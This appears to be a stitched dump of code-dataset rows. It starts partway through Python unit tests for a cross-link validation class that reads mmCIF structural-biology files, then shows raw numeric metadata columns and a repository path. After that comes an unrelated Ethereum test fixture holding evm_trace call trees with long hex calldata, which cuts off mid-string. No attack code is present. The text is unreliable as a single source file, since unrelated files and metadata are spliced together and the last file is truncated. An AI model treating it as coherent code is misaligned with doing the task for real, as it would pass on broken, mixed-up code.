self.assertEqual(1,I.get_xyzrseq_atoms(atom)['Seq'].unique()[0])
self.assertEqual('A',I.get_xyzrseq_atoms(atom)['Chain'].unique()[0])
self.assertEqual('CA',I.get_xyzrseq_atoms(atom)['Atom'].unique()[0])
self.assertEqual(54.401,I.get_xyzrseq_atoms(atom)['X'].unique()[0])
self.assertEqual('A_1',I.get_xyzrseq_atoms(atom)['Res_ID'].unique()[0])
def test_convert_df_unstruc(self):
fh = """
data_PDBDEV_test
_entry.id PDBDEV_test
loop_
_ihm_model_list.model_id
_ihm_model_list.model_name
_ihm_model_list.assembly_id
_ihm_model_list.protocol_id
_ihm_model_list.representation_id
1 . 1 1 1
#
loop_
_ihm_model_group.id
_ihm_model_group.name
_ihm_model_group.details
1 "Cluster 1" .
#
loop_
_ihm_model_group_link.group_id
_ihm_model_group_link.model_id
1 1
#
loop_
_ihm_sphere_obj_site.id
_ihm_sphere_obj_site.entity_id
_ihm_sphere_obj_site.seq_id_begin
_ihm_sphere_obj_site.seq_id_end
_ihm_sphere_obj_site.asym_id
_ihm_sphere_obj_site.Cartn_x
_ihm_sphere_obj_site.Cartn_y
_ihm_sphere_obj_site.Cartn_z
_ihm_sphere_obj_site.object_radius
_ihm_sphere_obj_site.rmsf
_ihm_sphere_obj_site.model_id
1 1 1 6 A 389.993 145.089 134.782 4.931 . 1
1 1 7 7 A 389.993 145.089 134.782 4.931 . 1
"""
with open('test.cif', 'w') as fd:
fd.write(fh)
I=cx_validation('test.cif')
spheres=I.get_sphere_model_dict()[1]
self.assertEqual((6,9),I.convert_df_unstruc(I.get_xyzrseq_spheres(spheres)[1]).shape)
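# The (6, 9) shape implies convert_df_unstruc expands a coarse bead spanning
# seq_id_begin..seq_id_end into one row per residue (here 1..6), presumably
# copying the bead's coordinates onto each generated row.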
def test_get_complete_df_hybrid(self):
fh = """
data_PDBDEV_test
_entry.id PDBDEV_test
loop_
_ihm_model_list.model_id
_ihm_model_list.model_name
_ihm_model_list.assembly_id
_ihm_model_list.protocol_id
_ihm_model_list.representation_id
1 . 1 1 1
#
loop_
_ihm_model_group.id
_ihm_model_group.name
_ihm_model_group.details
1 "Cluster 1" .
#
loop_
_ihm_model_group_link.group_id
_ihm_model_group_link.model_id
1 1
#
loop_
_ihm_sphere_obj_site.id
_ihm_sphere_obj_site.entity_id
_ihm_sphere_obj_site.seq_id_begin
_ihm_sphere_obj_site.seq_id_end
_ihm_sphere_obj_site.asym_id
_ihm_sphere_obj_site.Cartn_x
_ihm_sphere_obj_site.Cartn_y
_ihm_sphere_obj_site.Cartn_z
_ihm_sphere_obj_site.object_radius
_ihm_sphere_obj_site.rmsf
_ihm_sphere_obj_site.model_id
1 1 1 6 A 389.993 145.089 134.782 4.931 . 1
1 1 7 7 A 389.993 145.089 134.782 4.931 . 1
loop_
_ihm_cross_link_list.id
_ihm_cross_link_list.group_id
_ihm_cross_link_list.entity_description_1
_ihm_cross_link_list.entity_id_1
_ihm_cross_link_list.seq_id_1
_ihm_cross_link_list.comp_id_1
_ihm_cross_link_list.entity_description_2
_ihm_cross_link_list.entity_id_2
_ihm_cross_link_list.seq_id_2
_ihm_cross_link_list.comp_id_2
_ihm_cross_link_list.linker_type
_ihm_cross_link_list.dataset_list_id
1 1 foo 1 2 THR foo 1 3 CYS DSS 97
loop_
_struct_asym.id
_struct_asym.entity_id
_struct_asym.details
A 1 foo
"""
with open('test.cif', 'w') as fd:
fd.write(fh)
I=cx_validation('test.cif')
spheres=I.get_sphere_model_dict()[1]
df_s,df_u=I.get_xyzrseq_spheres(spheres)
df=I.convert_df_unstruc(df_u)
xl_df=I.get_xl_data()
self.assertEqual((1,11),I.get_complete_df_hybrid(xl_df,df).shape)
self.assertEqual(389.993,I.get_complete_df_hybrid(xl_df,df)['Res1_X'].unique()[0])
self.assertEqual('2_3',I.get_complete_df_hybrid(xl_df,df)['XL_ID'].unique()[0])
self.assertEqual('A_2',I.get_complete_df_hybrid(xl_df,df)['Res1'].unique()[0])
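# The assertions above pin down the naming conventions: XL_ID joins the two
# sequence positions as '<seq1>_<seq2>' ('2_3'), Res1/Res2 are
# '<chain>_<seq>' ('A_2'), and Res1_X comes from the bead covering that residue.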
def test_get_complete_df_atomic(self):
fh = """
data_PDBDEV_test
_entry.id PDBDEV_test
loop_
_ihm_model_list.model_id
_ihm_model_list.model_name
_ihm_model_list.assembly_id
_ihm_model_list.protocol_id
_ihm_model_list.representation_id
1 . 1 1 1
#
loop_
_ihm_model_group.id
_ihm_model_group.name
_ihm_model_group.details
1 "Cluster 1" .
#
loop_
_ihm_model_group_link.group_id
_ihm_model_group_link.model_id
1 1
#
loop_
_atom_site.group_PDB
_atom_site.id
_atom_site.type_symbol
_atom_site.label_atom_id
_atom_site.label_alt_id
_atom_site.label_comp_id
_atom_site.label_seq_id
_atom_site.label_asym_id
_atom_site.Cartn_x
_atom_site.Cartn_y
_atom_site.Cartn_z
_atom_site.occupancy
_atom_site.label_entity_id
_atom_site.auth_asym_id
_atom_site.B_iso_or_equiv
_atom_site.pdbx_PDB_model_num
_atom_site.ihm_model_id
ATOM 1 CA CA . SER 1 A 54.401 -49.984 -35.287 . 1 A . 1 1
ATOM 2 CA CA . SER 2 A 54.401 -49.984 -35.287 . 3 A . 1 1
ATOM 3 CA CA . SER 3 A 54.401 -49.984 -35.287 . 3 A . 1 1
loop_
_ihm_cross_link_list.id
_ihm_cross_link_list.group_id
_ihm_cross_link_list.entity_description_1
_ihm_cross_link_list.entity_id_1
_ihm_cross_link_list.seq_id_1
_ihm_cross_link_list.comp_id_1
_ihm_cross_link_list.entity_description_2
_ihm_cross_link_list.entity_id_2
_ihm_cross_link_list.seq_id_2
_ihm_cross_link_list.comp_id_2
_ihm_cross_link_list.linker_type
_ihm_cross_link_list.dataset_list_id
1 1 foo 1 2 THR foo 1 3 CYS DSS 97
loop_
_struct_asym.id
_struct_asym.entity_id
_struct_asym.details
A 1 foo
"""
with open('test.cif', 'w') as fd:
fd.write(fh)
I=cx_validation('test.cif')
atom=I.get_atom_model_dict()[1]
df=I.get_xyzrseq_atoms(atom)
xl_df=I.get_xl_data()
self.assertEqual((1,11),I.get_complete_df_atomic(xl_df,df).shape)
self.assertEqual(54.401,I.get_complete_df_atomic(xl_df,df)['Res1_X'].unique()[0])
self.assertEqual('2_3',I.get_complete_df_atomic(xl_df,df)['XL_ID'].unique()[0])
self.assertEqual('A_2',I.get_complete_df_atomic(xl_df,df)['Res1'].unique()[0])
def test_get_distance(self):
lst=pd.DataFrame([[4,5,6,1,2,3]],columns=['Res1_X','Res1_Y','Res1_Z',
'Res2_X','Res2_Y','Res2_Z'])
I=cx_validation('test.cif')
self.assertEqual(5,int(I.get_distance(lst)['dist'].values[0]))
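# Sanity check: dist = sqrt((4-1)^2 + (5-2)^2 + (6-3)^2) = sqrt(27) ~ 5.196,
# which int() truncates to 5, matching the assertion above.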
def test_label_inter_intra_1(self):
lst=pd.DataFrame([['C_4','C_5']],columns=['Res1','Res2'])
I=cx_validation('test.cif')
self.assertEqual(1,int(I.label_inter_intra(lst)['Intra'].values[0]))
def test_label_inter_intra_2(self):
lst=pd.DataFrame([['C_4','D_5']],columns=['Res1','Res2'])
I=cx_validation('test.cif')
self.assertEqual(0,int(I.label_inter_intra(lst)['Intra'].values[0]))
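# Together these two tests show label_inter_intra keys on the chain prefix
# before '_': C_4/C_5 share chain C (Intra == 1), C_4/D_5 do not (Intra == 0).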
def test_get_violation(self):
I=cx_validation('test.cif')
self.assertEqual(0,I.get_violation('DSS',31))
self.assertEqual(1,I.get_violation('DSS',29))
self.assertEqual(1,I.get_violation('EDC',20))
self.assertEqual(0,I.get_violation('EDC',29))
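# The assertions imply per-linker distance cutoffs, with 1 meaning the
# restraint is satisfied (despite the function's name; cf. the 'Satisfied'
# column in test_get_violation_plot): about 30 A for DSS (29 -> 1, 31 -> 0)
# and somewhere between 20 and 29 A for EDC (20 -> 1, 29 -> 0).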
def test_process_ambiguity(self):
lst=pd.DataFrame([['C_4',23],['C_4',11],['C_5',22]],columns=['XL_ID','dist'])
I=cx_validation('test.cif')
self.assertEqual(22,I.process_ambiguity(lst)['dist'].values[0])
self.assertEqual(11,I.process_ambiguity(lst)['dist'].values[1])
self.assertEqual('C_5',I.process_ambiguity(lst)['XL_ID'].values[0])
self.assertEqual('C_4',I.process_ambiguity(lst)['XL_ID'].values[1])
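# process_ambiguity apparently keeps only the minimum distance per ambiguous
# XL_ID group: the two C_4 rows (23, 11) collapse to 11 while C_5 keeps 22,
# with the surviving rows returned C_5-first.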
def test_get_violation_plot(self):
lst=pd.DataFrame([['C_4',0],['C_4',1],['C_5',1]],columns=['XL_ID','Satisfied'])
model_df={1:lst}
I=cx_validation('test.cif')
self.assertEqual(66,int(I.get_violation_plot(model_df)[1]))
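# 2 of the 3 cross-links are marked Satisfied and int(2 / 3 * 100) == 66, so
# get_violation_plot(...)[1] evidently reports percent satisfied per model id.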
if __name__ == '__main__':
unittest.main(warnings='ignore')
| 27.145648
| 87
| 0.787345
| 2,872
| 15,283
| 3.706128
| 0.067201
| 0.054867
| 0.054115
| 0.072153
| 0.897501
| 0.874859
| 0.828354
| 0.793311
| 0.777809
| 0.769448
| 0
| 0.046472
| 0.087614
| 15,283
| 562
| 88
| 27.19395
| 0.716867
| 0.010338
| 0
| 0.79619
| 0
| 0.011429
| 0.581512
| 0.359423
| 0
| 0
| 0
| 0
| 0.102857
| 1
| 0.038095
| false
| 0
| 0.011429
| 0
| 0.053333
| 0.001905
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
ac1f5723d7fabd1670fe8946ed82a6eaa81db9a9
| 237,531
|
py
|
Python
|
tests/functional/data/python/__init__.py
|
johnson2427/ape
|
e0dbce86d7ddb4574df109f443718f19dc183608
|
[
"Apache-2.0"
] | null | null | null |
tests/functional/data/python/__init__.py
|
johnson2427/ape
|
e0dbce86d7ddb4574df109f443718f19dc183608
|
[
"Apache-2.0"
] | 1
|
2022-02-12T01:31:16.000Z
|
2022-02-22T00:26:49.000Z
|
tests/functional/data/python/__init__.py
|
johnson2427/ape
|
e0dbce86d7ddb4574df109f443718f19dc183608
|
[
"Apache-2.0"
] | null | null | null |
from evm_trace import CallType
from evm_trace.display import DisplayableCallTreeNode
from hexbytes import HexBytes
from ape_ethereum.transactions import TransactionStatusEnum
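# Fixture data for ape's functional tests: two evm_trace call trees
# (presumably captured from a local dev-chain transaction and a mainnet
# transaction), stored as plain dicts in the shape of evm_trace call-tree nodes.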
LOCAL_CALL_TREE_DICT = {
"call_type": CallType.CALL,
"address": "a",
"value": 123,
"depth": 0,
"gas_limit": 492533,
"gas_cost": 469604,
"calldata": HexBytes("0x372dca07"),
"returndata": HexBytes(
"0x000000000000000000000000000000000000000000000000000000000000002000000000000000000000000000000000000000000000000000000000000000200000000000000000000000001e59ce931b4cfea3fe4b875411e280e173cb7a9c" # noqa: E501
),
"calls": [
{
"call_type": CallType.CALL,
"address": "b",
"value": 0,
"depth": 1,
"gas_limit": 468829,
"gas_cost": 461506,
"calldata": HexBytes(
"0x045856de00000000000000000000000000000000000000000000000000000000000393cc"
),
"returndata": HexBytes(
"0x00000000000000000000000000000000000000000000000000001564ff3f0da300000000000000000000000000000000000000000000000000000002964619c700000000000000000000000000000000000000000000000000000000000393cc00000000000000000000000000000000000000000000000004cae9c39bdb4f7700000000000000000000000000000000000000000000000000005af310694bb20000000000000000000000000000000000000000011dc18b6f8f1601b7b1b33100000000000000000000000000000000000000000000000000000000000393cc000000000000000000000000000000000000000000000004ffd72d92184e6bb20000000000000000000000000000000000000000000000000000000000000d7e000000000000000000000000000000000000000000000006067396b875234f7700000000000000000000000000000000000000000000000000012f39bc807bb20000000000000000000000000000000000000002f5db749b3db467538fb1b331"
),
"calls": [],
"selfdestruct": False,
"failed": False,
"display_cls": DisplayableCallTreeNode,
},
{
"call_type": CallType.CALL,
"address": "b",
"value": 0,
"depth": 1,
"gas_limit": 408447,
"gas_cost": 402067,
"calldata": HexBytes(
"0xbeed0f8500000000000000000000000000000000000000000000000000000000000000400000000000000000000000000000000000000000011dc18b6f8f1601b7b1b33100000000000000000000000000000000000000000000000000000000000000096963652d637265616d0000000000000000000000000000000000000000000000"
),
"returndata": HexBytes("0x"),
"calls": [
{
"call_type": CallType.STATICCALL,
"address": "c",
"value": 0,
"depth": 2,
"gas_limit": 375975,
"gas_cost": 370103,
"calldata": HexBytes("0x7007cbe8"),
"returndata": HexBytes(
"0x000000000000000000000000000000000293b0e3558d33b8a4c483e40e2b8db9000000000000000000000000000000000000000000000000018b932eebcc7eb90000000000000000000000000000000000bf550935e92f79f09e3530df8660c5"
),
"calls": [],
"selfdestruct": False,
"failed": False,
"display_cls": DisplayableCallTreeNode,
},
{
"call_type": CallType.CALL,
"address": "c",
"value": 0,
"depth": 2,
"gas_limit": 369643,
"gas_cost": 363869,
"calldata": HexBytes(
"0x878fb70100000000000000000000000000000000000000000000000000000000000000600000000000000000000000000000000000000000011dc18b6f8f1601b7b1b331000000000000000000000000f2df0b975c0c9efa2f8ca0491c2d1685104d2488000000000000000000000000000000000000000000000000000000000000000773696d706c657200000000000000000000000000000000000000000000000000"
),
"returndata": HexBytes("0x"),
"calls": [],
"selfdestruct": False,
"failed": False,
"display_cls": DisplayableCallTreeNode,
},
],
"selfdestruct": False,
"failed": False,
"display_cls": DisplayableCallTreeNode,
},
{
"call_type": CallType.CALL,
"address": "b",
"value": 0,
"depth": 1,
"gas_limit": 237135,
"gas_cost": 233432,
"calldata": HexBytes(
"0xb27b88040000000000000000000000001e59ce931b4cfea3fe4b875411e280e173cb7a9c"
),
"returndata": HexBytes(
"0x0000000000000000000000001e59ce931b4cfea3fe4b875411e280e173cb7a9c"
),
"calls": [],
"selfdestruct": False,
"failed": False,
"display_cls": DisplayableCallTreeNode,
},
{
"call_type": CallType.CALL,
"address": "b",
"value": 0,
"depth": 1,
"gas_limit": 235631,
"gas_cost": 231951,
"calldata": HexBytes(
"0xb9e5b20a0000000000000000000000001e59ce931b4cfea3fe4b875411e280e173cb7a9c"
),
"returndata": HexBytes("0x"),
"calls": [
{
"call_type": CallType.STATICCALL,
"address": "c",
"value": 0,
"depth": 2,
"gas_limit": 230967,
"gas_cost": 227360,
"calldata": HexBytes(
"0xe5e1d93f000000000000000000000000f2df0b975c0c9efa2f8ca0491c2d1685104d2488"
),
"returndata": HexBytes(
"0x00000000000000000000000000000000000000000000000000000000000000600000000000000000000000000000000000000000011dc18b6f8f1601b7b1b331000000000000000000000000f2df0b975c0c9efa2f8ca0491c2d1685104d2488000000000000000000000000000000000000000000000000000000000000000773696d706c657200000000000000000000000000000000000000000000000000"
),
"calls": [],
"selfdestruct": False,
"failed": False,
"display_cls": DisplayableCallTreeNode,
},
{
"call_type": CallType.CALL,
"address": "c",
"value": 0,
"depth": 2,
"gas_limit": 225789,
"gas_cost": 222263,
"calldata": HexBytes(
"0x878fb70100000000000000000000000000000000000000000000000000000000000000600000000000000000000000000000000000000000000000000000000000000000000000000000000000000000274b028b03a250ca03644e6c578d81f019ee1323000000000000000000000000000000000000000000000000000000000000000773696d706c657200000000000000000000000000000000000000000000000000"
),
"returndata": HexBytes("0x"),
"calls": [],
"selfdestruct": False,
"failed": False,
"display_cls": DisplayableCallTreeNode,
},
{
"call_type": CallType.CALL,
"address": "c",
"value": 0,
"depth": 2,
"gas_limit": 149571,
"gas_cost": 147236,
"calldata": HexBytes("0x90bb7141"),
"returndata": HexBytes("0x"),
"calls": [],
"selfdestruct": False,
"failed": False,
"display_cls": DisplayableCallTreeNode,
},
{
"call_type": CallType.CALL,
"address": "c",
"value": 0,
"depth": 2,
"gas_limit": 123951,
"gas_cost": 122016,
"calldata": HexBytes("0x90bb7141"),
"returndata": HexBytes("0x"),
"calls": [],
"selfdestruct": False,
"failed": False,
"display_cls": DisplayableCallTreeNode,
},
],
"selfdestruct": False,
"failed": False,
"display_cls": DisplayableCallTreeNode,
},
{
"call_type": CallType.STATICCALL,
"address": "c",
"value": 0,
"depth": 1,
"gas_limit": 101895,
"gas_cost": 100305,
"calldata": HexBytes(
"0xbff2e0950000000000000000000000001e59ce931b4cfea3fe4b875411e280e173cb7a9c"
),
"returndata": HexBytes(
"0x0000000000000000000000000000000000000000000000000000000000000000"
),
"calls": [],
"selfdestruct": False,
"failed": False,
"display_cls": DisplayableCallTreeNode,
},
{
"call_type": CallType.STATICCALL,
"address": "b",
"value": 0,
"depth": 1,
"gas_limit": 95764,
"gas_cost": 94270,
"calldata": HexBytes(
"0x9155fd570000000000000000000000001e59ce931b4cfea3fe4b875411e280e173cb7a9c"
),
"returndata": HexBytes(
"0x0000000000000000000000000000000000000000000000000000000000000000"
),
"calls": [],
"selfdestruct": False,
"failed": False,
"display_cls": DisplayableCallTreeNode,
},
{
"call_type": CallType.CALL,
"address": "b",
"value": 0,
"depth": 1,
"gas_limit": 93784,
"gas_cost": 92321,
"calldata": HexBytes(
"0xbeed0f850000000000000000000000000000000000000000000000000000000000000040000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000096c656d6f6e64726f700000000000000000000000000000000000000000000000"
),
"returndata": HexBytes("0x"),
"calls": [
{
"call_type": CallType.STATICCALL,
"address": "c",
"value": 0,
"depth": 2,
"gas_limit": 87872,
"gas_cost": 86501,
"calldata": HexBytes("0x7007cbe8"),
"returndata": HexBytes(
"0x000000000000000000000000000000000293b0e3558d33b8a4c483e40e2b8db9000000000000000000000000000000000000000000000000018b932eebcc7eb90000000000000000000000000000000000bf550935e92f79f09e3530df8660c5"
),
"calls": [],
"selfdestruct": False,
"failed": False,
"display_cls": DisplayableCallTreeNode,
},
{
"call_type": CallType.CALL,
"address": "c",
"value": 0,
"depth": 2,
"gas_limit": 84040,
"gas_cost": 82729,
"calldata": HexBytes(
"0x878fb70100000000000000000000000000000000000000000000000000000000000000600000000000000000000000000000000000000000000000000000000000000000000000000000000000000000f2df0b975c0c9efa2f8ca0491c2d1685104d2488000000000000000000000000000000000000000000000000000000000000000773696d706c657200000000000000000000000000000000000000000000000000"
),
"returndata": HexBytes("0x"),
"calls": [],
"selfdestruct": False,
"failed": False,
"display_cls": DisplayableCallTreeNode,
},
],
"selfdestruct": False,
"failed": False,
"display_cls": DisplayableCallTreeNode,
},
{
"call_type": CallType.CALL,
"address": "b",
"value": 0,
"depth": 1,
"gas_limit": 56127,
"gas_cost": 55252,
"calldata": HexBytes(
"0xbeed0f850000000000000000000000000000000000000000000000000000000000000040000000000000000000000000000000000000000000000000000000000000006f0000000000000000000000000000000000000000000000000000000000000014736e6974636865735f6765745f73746963686573000000000000000000000000"
),
"returndata": HexBytes("0x"),
"calls": [
{
"call_type": CallType.STATICCALL,
"address": "c",
"value": 0,
"depth": 2,
"gas_limit": 52903,
"gas_cost": 52079,
"calldata": HexBytes("0x7007cbe8"),
"returndata": HexBytes(
"0x000000000000000000000000000000000293b0e3558d33b8a4c483e40e2b8db9000000000000000000000000000000000000000000000000018b932eebcc7eb90000000000000000000000000000000000bf550935e92f79f09e3530df8660c5"
),
"calls": [],
"selfdestruct": False,
"failed": False,
"display_cls": DisplayableCallTreeNode,
},
{
"call_type": CallType.CALL,
"address": "c",
"value": 0,
"depth": 2,
"gas_limit": 49071,
"gas_cost": 48306,
"calldata": HexBytes(
"0x878fb7010000000000000000000000000000000000000000000000000000000000000060000000000000000000000000000000000000000000000000000000000000006f000000000000000000000000f2df0b975c0c9efa2f8ca0491c2d1685104d2488000000000000000000000000000000000000000000000000000000000000000773696d706c657200000000000000000000000000000000000000000000000000"
),
"returndata": HexBytes("0x"),
"calls": [],
"selfdestruct": False,
"failed": False,
"display_cls": DisplayableCallTreeNode,
},
],
"selfdestruct": False,
"failed": False,
"display_cls": DisplayableCallTreeNode,
},
],
"selfdestruct": False,
"failed": False,
"display_cls": DisplayableCallTreeNode,
}
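# Each node in the fixture carries call_type, address, value, depth, the
# gas_limit/gas_cost pair, calldata/returndata as HexBytes, a nested "calls"
# list, and selfdestruct/failed flags plus the display class. A minimal
# sketch for walking the tree (flatten_calls is a hypothetical helper, not
# part of this module):
def flatten_calls(node):
    """Yield a call node followed, recursively, by all of its sub-calls."""
    yield node
    for child in node["calls"]:
        yield from flatten_calls(child)

# e.g. total gas charged across the local tree:
# sum(call["gas_cost"] for call in flatten_calls(LOCAL_CALL_TREE_DICT))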
MAINNET_CALL_TREE_DICT = {
"call_type": CallType.CALL,
"address": HexBytes("0xf14f0648435cf34f8bc800d4e71ff0ba15bc52dd"),
"value": 20160000000000000,
"depth": 0,
"gas_limit": 1362033,
"gas_cost": 1070997,
"calldata": HexBytes(
"0x1cff79cd000000000000000000000000533c8844ba1922b88d892aca090df0cc0c292f1b00000000000000000000000000000000000000000000000000000000000000400000000000000000000000000000000000000000000000000000000000000ac4f708847b00000000000000000000000000000000000000000000000000000000000000800000000000000000000000004ddc2d193948926d02f9b1fe9e1daa0718270ed5000000000000000000000000f650c3d88d12db855b8bf7d11be6c55a4e07dcc90000000000000000000000000000000000000000000000000000000000000000000000000000000000000000dac17f958d2ee523a2206206994597c13d831ec7000000000000000000000000eeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeee000000000000000000000000000000000000000000000000000000051f4d5c0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000067a4a5343b74de28cc000000000000000000000000000003ba0319533c578527ae69bf7fa2d289f20b9b55c00000000000000000000000061935cbdd02287b511119ddb11aeb42f1593b7ef00000000000000000000000000000000000000000000000000000000000001200000000000000000000000000000000000000000068b0a6df6d303ae8900000000000000000000000000000000000000000000000000000000000000000008e8a6c3bf330000000000000000000000000000000000000000000000000000000000000060000000000000000000000000000000000000000000000000000000051f4d5c00000000000000000000000000000000000000000000000000000000000000078000000000000000000000000000000000000000000000000000000000000000020000000000000000000000000000000000000000000000000000000000000040000000000000000000000000000000000000000000000000000000000000026000000000000000000000000057845987c8c859d52931ee248d8d84ab10532407000000000000000000000000f14f0648435cf34f8bc800d4e71ff0ba15bc52dd000000000000000000000000100000000000000000000000000000000000001100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000026ac56ad607a6a00000000000000000000000000000000000000000000000000000000005209d0d7f00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000005fb4acca00000000000000000000000000000000000000000000000000000175d9c171a700000000000000000000000000000000000000000000000000000000000001c0000000000000000000000000000000000000000000000000000000000000064000000000000000000000000000000000000000000000000000000000000006a000000000000000000000000000000000000000000000000000000000000006a00000000000000000000000000000000000000000000000000000000000000024f47261b0000000000000000000000000c02aaa39b223fe8d0a0e5c4f27ead9083c756cc200000000000000000000000000000000000000000000000000000000000000000000000000000000c47b7094f378e54347e281aab170e8cca69d880a000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000002640810b1f010301d000000000000000000000000000000000000000000000000000000051f4d5c0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000005fb4c8876573a792d8faba391a985b937c96dfe336f8022285a4e5d5fa2b07c3eef9834600000000000000000000000000000000000000000000000000000000000001c00000000000000000000000000000000000000000000000000000000000000420000000000000000000000000000000000000000000000000000000000000048000000000000000000000000000000000000000000000000000000000000004800000000000000000000000000000000000000000000000000000000000000224dc1600f3
000000000000000000000000c02aaa39b223fe8d0a0e5c4f27ead9083c756cc2000000000000000000000000c47b7094f378e54347e281aab170e8cca69d880a000000000000000000000000000000000000000000000000000000000000006000000000000000000000000000000000000000000000000000000000000001a0000000000000000000000000dac17f958d2ee523a2206206994597c13d831ec7000000000000000000000000000000000000000000000000000000000000004000000000000000000000000000000000000000000000000000000000000000010000000000000000000000000000000000000000000000000000000000000020000000000000000000000000dcd6011f4c6b80e470d9487f5871a0cba7c93f48000000000000000000000000000000000000000000000000000000051f4d5c00000000000000000000000000000000000000000000000002640810b1f010301d0000000000000000000000000000000000000000000000000000000000000080000000000000000000000000000000000000000000000000000000000000008000000000000000000000000000000000000000000000000000000000000000200000000000000000000000000000000000000000000000000000000000000002000000000000000000000000dac17f958d2ee523a2206206994597c13d831ec7000000000000000000000000c02aaa39b223fe8d0a0e5c4f27ead9083c756cc2000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000024f47261b0000000000000000000000000dac17f958d2ee523a2206206994597c13d831ec70000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000002000000000000000000000000000000000000000000000000000000000000004000000000000000000000000000000000000000000000000000000000000000c000000000000000000000000000000000000000000000000000000000000000421ca1a7c12b193b68e6ac3d4269b9c1fd75051a012db63ecd99d217f7b8bc95badb74a1c07e0046c5f98f8b3acf1f745d1cc0b8950ec852ba929ca1479c6e025ff10300000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000010400000000000000000000000000000000000000000000000000000000000000869584cd000000000000000000000000322d58b9e75a6918f7e7849aee0ff09369977e0800000000000000000000000000000000000000000000003cf9caf5925fb4ac6700000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000"
),
"returndata": HexBytes("0x0000000000000000000000000000000000000000000000000000000000000000"),
"calls": [
{
"call_type": CallType.DELEGATECALL,
"address": HexBytes("0x533c8844ba1922b88d892aca090df0cc0c292f1b"),
"value": 20160000000000000,
"depth": 0,
"gas_limit": 1311551,
"gas_cost": 1041213,
"calldata": HexBytes(
"0xf708847b00000000000000000000000000000000000000000000000000000000000000800000000000000000000000004ddc2d193948926d02f9b1fe9e1daa0718270ed5000000000000000000000000f650c3d88d12db855b8bf7d11be6c55a4e07dcc90000000000000000000000000000000000000000000000000000000000000000000000000000000000000000dac17f958d2ee523a2206206994597c13d831ec7000000000000000000000000eeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeee000000000000000000000000000000000000000000000000000000051f4d5c0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000067a4a5343b74de28cc000000000000000000000000000003ba0319533c578527ae69bf7fa2d289f20b9b55c00000000000000000000000061935cbdd02287b511119ddb11aeb42f1593b7ef00000000000000000000000000000000000000000000000000000000000001200000000000000000000000000000000000000000068b0a6df6d303ae8900000000000000000000000000000000000000000000000000000000000000000008e8a6c3bf330000000000000000000000000000000000000000000000000000000000000060000000000000000000000000000000000000000000000000000000051f4d5c00000000000000000000000000000000000000000000000000000000000000078000000000000000000000000000000000000000000000000000000000000000020000000000000000000000000000000000000000000000000000000000000040000000000000000000000000000000000000000000000000000000000000026000000000000000000000000057845987c8c859d52931ee248d8d84ab10532407000000000000000000000000f14f0648435cf34f8bc800d4e71ff0ba15bc52dd000000000000000000000000100000000000000000000000000000000000001100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000026ac56ad607a6a00000000000000000000000000000000000000000000000000000000005209d0d7f00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000005fb4acca00000000000000000000000000000000000000000000000000000175d9c171a700000000000000000000000000000000000000000000000000000000000001c0000000000000000000000000000000000000000000000000000000000000064000000000000000000000000000000000000000000000000000000000000006a000000000000000000000000000000000000000000000000000000000000006a00000000000000000000000000000000000000000000000000000000000000024f47261b0000000000000000000000000c02aaa39b223fe8d0a0e5c4f27ead9083c756cc200000000000000000000000000000000000000000000000000000000000000000000000000000000c47b7094f378e54347e281aab170e8cca69d880a000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000002640810b1f010301d000000000000000000000000000000000000000000000000000000051f4d5c0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000005fb4c8876573a792d8faba391a985b937c96dfe336f8022285a4e5d5fa2b07c3eef9834600000000000000000000000000000000000000000000000000000000000001c00000000000000000000000000000000000000000000000000000000000000420000000000000000000000000000000000000000000000000000000000000048000000000000000000000000000000000000000000000000000000000000004800000000000000000000000000000000000000000000000000000000000000224dc1600f3000000000000000000000000c02aaa39b223fe8d0a0e5c4f27ead9083c756cc2000000000000000000000000c47b7094f378e54347e281aab170e8cca69d880a000000000000000000000000000000000000000000000000000000000000006000000000
000000000000000000000000000000000000000000000000000001a0000000000000000000000000dac17f958d2ee523a2206206994597c13d831ec7000000000000000000000000000000000000000000000000000000000000004000000000000000000000000000000000000000000000000000000000000000010000000000000000000000000000000000000000000000000000000000000020000000000000000000000000dcd6011f4c6b80e470d9487f5871a0cba7c93f48000000000000000000000000000000000000000000000000000000051f4d5c00000000000000000000000000000000000000000000000002640810b1f010301d0000000000000000000000000000000000000000000000000000000000000080000000000000000000000000000000000000000000000000000000000000008000000000000000000000000000000000000000000000000000000000000000200000000000000000000000000000000000000000000000000000000000000002000000000000000000000000dac17f958d2ee523a2206206994597c13d831ec7000000000000000000000000c02aaa39b223fe8d0a0e5c4f27ead9083c756cc2000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000024f47261b0000000000000000000000000dac17f958d2ee523a2206206994597c13d831ec70000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000002000000000000000000000000000000000000000000000000000000000000004000000000000000000000000000000000000000000000000000000000